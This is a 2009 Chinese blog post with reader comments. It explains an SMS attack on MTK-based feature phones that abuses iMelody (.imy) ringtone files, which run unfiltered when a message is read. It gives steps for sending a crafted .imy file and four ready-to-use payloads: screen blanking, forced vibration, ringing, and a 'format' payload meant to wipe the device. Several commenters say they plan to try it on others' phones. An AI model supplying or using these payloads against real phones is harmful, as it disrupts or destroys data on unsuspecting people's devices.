方向比努力重要,能力比知识重要,健康比成绩重要,生活比文凭重要,情商比智商重要!影响手机品牌:所有MTK方案手机(也就是我们常说的山寨手机)
且 写短信时有【“选项”——“插入对象”——“我的铃声”】这一功能(大部分山寨手机都有此功能)
漏洞原理:
在大部分MTK方案手机中,编写短信息的时候可以插入一种“imy”格式的铃声文件,
而具有同样功能的手机接收到此短信后在查看信息内容的同时可以听到短信息内插入的铃声
由于MTK方案手机在阅读短信息的时候对“imy”文件内容不经过过滤而直接执行。
所以我们可以在“imy”文件内插入代码,通过代码调用手机的解码芯片发出一些声音甚至一些核心指令。
通过这种方式可实现对MTK方案手机的短信攻击。
操作方式:
在电脑上新建文本文档,写入代码,保存为“imy”格式文件。
将这个文件放入手机的“Audio”文件夹内。(注意,一定是手机的“Audio”文件夹,而非内存卡上。)
用手机编辑短信,“选项”——“插入对象”——“我的铃声”,选择你写的“imy”文件。
完成,发送…
黑屏代码:
1 2 3 4 | BEGIN:IMELODY BEAT:1200 MELODY:(ledoffbackoffvibeoffr5ledoffbackoffvibeoffr5@600) END:IMELODY |
猛震代码:
1 2 3 4 5 6 | BEGIN:IMELODY VERSION:1.2 FORMAT:CLASS1.0 BEAT:100 MELODY:(ledoffledonbackoffbackonvibeon@300) END:IMELODY |
振铃代码:
1 2 3 4 5 6 | BEGIN:IMELODY VERSION:1.2 FORMAT:CLASS1.0 BEAT:200 MELODY:(ledoffbackoffvibeonr5vibeoffledonbackonr5@200) END:IMELODY |
格式化代码:(请慎用)
1 2 3 4 5 6 7 | BEGIN:IMELODY VERSION:1.2 FORMAT:CLASS1.0 COMPOSER:MTK(23)Fomat BEAT:180 MELODY:backoffbackofffbackoffbackoffbackoffbackoffbackoffbackoffbackoff (+"@9999999999999999999999999">"++"@9999999999999999999999999)" |
注意:“@”后面的数字越大,重复次数越多
预防MTK手机漏洞:
MTK所有支持imy铃声的手机都会中招。至于预防,我想这是很难的,毕竟只要触发就会中招,只能是看到类似的短信立即关闭,不继续翻阅从而避免激活imy文件代码。当然,这只是相对的,如果对方发送的短信是先插入的imy文件再写文字的话,那就不可避免了。更好的方法,不要打开本地接受到的短信,用飞信接受对方发来的短信信息。
星期二, 二月 8, 2011 at 5:39
Can’t wait to get this! I can feel a pretend heart attack coming so I can stay home from College and waste time playing this.
星期六, 九月 4, 2010 at 23:22
I enjoyed reading your blog. Keep it that way.
星期六, 一月 23, 2010 at 20:18
额,当年我那步步高手机也被黑了,挺郁闷的,MTK俨然成了山寨专用,不过对淘宝定制的手机竟然也去采用MTK方案感到汗颜。。
星期五, 一月 8, 2010 at 16:23
山寨机用户遭殃了。
星期三, 十二月 30, 2009 at 9:03
你牛,你强悍。
星期二, 十二月 29, 2009 at 12:50
呵呵,博主人气很高咧,哈哈!
星期五, 十二月 25, 2009 at 9:46
今天是个好节日
小酷祝你圣诞快乐!
星期五, 十二月 25, 2009 at 10:42
谢谢小酷!
星期五, 十二月 25, 2009 at 1:53
圣诞快乐~!元旦快乐~!
星期五, 十二月 25, 2009 at 10:43
一样啊,Happy New Year
星期四, 十二月 24, 2009 at 22:24
Merry Christmas ~ O(∩_∩)O ~
* ,
_/^\_
* /.-.\ *
* `/&\` *
,@.*;@,
/_o.I %_\ *
* (`’–:o(_@;
/`;–.,__ `’) *
;@`o % O,*`’`&\
* (`’–)_@ ;o %’()\ *
/`;–._`”–._O’@;
/&*,()~o`;-.,_ `””`)
* /`,@ ;+& () o*`;-’;\
(`””–.,_0o*`;-’ &()\
/-.,_ “”–….-’`) *
* /@%;o`:;’–,.__ __.’\
;*,&(); @ % &^;~`”`o;@(); *
/()dev & ().oFriendsO\
`”=”==””==,,,.,=”==”===”`
__.—-.(\-”#####—…___…—–._
‘` \)_`”””””`
.–’ ‘)
o( )_-\
`”””` `
星期四, 十二月 24, 2009 at 20:22
博主节日快乐啊。
Merry Christmas & Happy New Year
星期四, 十二月 24, 2009 at 20:24
谢谢,节日快乐.
星期四, 十二月 24, 2009 at 19:47
平安夜快乐,圣诞快乐!
星期四, 十二月 24, 2009 at 16:27
还是少使为妙,一不小心搞死掉了~
星期四, 十二月 24, 2009 at 14:45
去年就有公布了,黑X上也有,,,不过更早的是07年大家就乱发这种短信了..效果不错,
星期四, 十二月 24, 2009 at 0:15
不是吧,,,,
星期三, 十二月 23, 2009 at 23:37
MTK指的是那些非智能手机的操作系统么··
星期三, 十二月 23, 2009 at 19:54
这样就可以造成别人手机黑屏么?对方手机要什么牌子呢???
星期四, 十二月 24, 2009 at 9:18
只要是采用MTK方案的即可
星期三, 十二月 23, 2009 at 14:38
来了,总得扯一嗓子吧…
星期三, 十二月 23, 2009 at 0:46
山寨基地 http://www.shanzhaijidi.com
期待您的加入,咱们一起交流
星期二, 十二月 22, 2009 at 21:53
人民表示人民用的不是山寨机=w=
星期二, 十二月 22, 2009 at 20:00
手机的事知道得太少了,汗^_^
回访来了
星期二, 十二月 22, 2009 at 17:07
我的没事!哈哈
星期二, 十二月 22, 2009 at 16:55
Merry Christmas 圣诞快乐!
星期二, 十二月 22, 2009 at 16:59
同乐
星期二, 十二月 22, 2009 at 16:01
非智能机也有着漏洞?
星期二, 十二月 22, 2009 at 16:14
是的.
星期二, 十二月 22, 2009 at 15:33
先试试,在别人的手机上,呵呵
星期二, 十二月 22, 2009 at 14:45
基本都是山寨手机中招
星期二, 十二月 22, 2009 at 14:01
这个果真很邪恶啊!!
星期二, 十二月 22, 2009 at 12:17
高手啊,我不明真相。
星期二, 十二月 22, 2009 at 11:04
记得有些老手机给它一条闪信就挂了。
星期二, 十二月 22, 2009 at 7:05
俺不需要这些吧?
星期二, 十二月 22, 2009 at 1:44
深奥啊 搞不懂~
星期一, 十二月 21, 2009 at 22:59
黑莓的漂过- -
星期一, 十二月 21, 2009 at 22:34
没有需求
星期一, 十二月 21, 2009 at 21:30
MTK我没搞过,我用的都是智能的!
星期一, 十二月 21, 2009 at 21:23
不用山寨的路过..
星期一, 十二月 21, 2009 at 21:17
我现在是穷到连山寨机都没钱买了=。=
星期一, 十二月 21, 2009 at 20:42
我靠,天语就有。不过我用的是PPC,不怕,哈哈
星期一, 十二月 21, 2009 at 20:25
不用山寨,贴牌的也不用
星期一, 十二月 21, 2009 at 20:25
以前被人这样玩过!直接死机!
星期一, 十二月 21, 2009 at 20:14
对我时间不管用,找个山寨试试
星期一, 十二月 21, 2009 at 19:54
我来了解一下哈!
星期一, 十二月 21, 2009 at 19:34
对山寨机没有好感。。。
星期一, 十二月 21, 2009 at 18:42
来回访朋友!你的真正是技术型的博呀^_^学习分享
星期一, 十二月 21, 2009 at 18:43
欢迎,有空常来.
星期一, 十二月 21, 2009 at 16:53
MTK方案也是最廉价的方案。。。
星期一, 十二月 21, 2009 at 13:03
还没用过山寨的呢……
星期一, 十二月 21, 2009 at 12:29
山寨机果然不安全
星期一, 十二月 21, 2009 at 11:53
完全对山寨机不敢兴趣~
当然如果是用于夏普的MTK系统,我可能会注意一下~
星期一, 十二月 21, 2009 at 12:02
用的是Willin编写的.
星期一, 十二月 21, 2009 at 11:32
千万别用山寨的……
星期一, 十二月 21, 2009 at 11:11
很邪恶的代码啊 哈哈!
星期一, 十二月 21, 2009 at 11:22
呵呵,MTK漏洞多
星期一, 十二月 21, 2009 at 10:09
MTK山寨机都在用
星期一, 十二月 21, 2009 at 11:21
那应该防护好.
星期一, 十二月 21, 2009 at 9:55
嘿嘿…..
了解,恶搞下那些山寨手机先。
星期一, 十二月 21, 2009 at 11:21
方案慎用阿..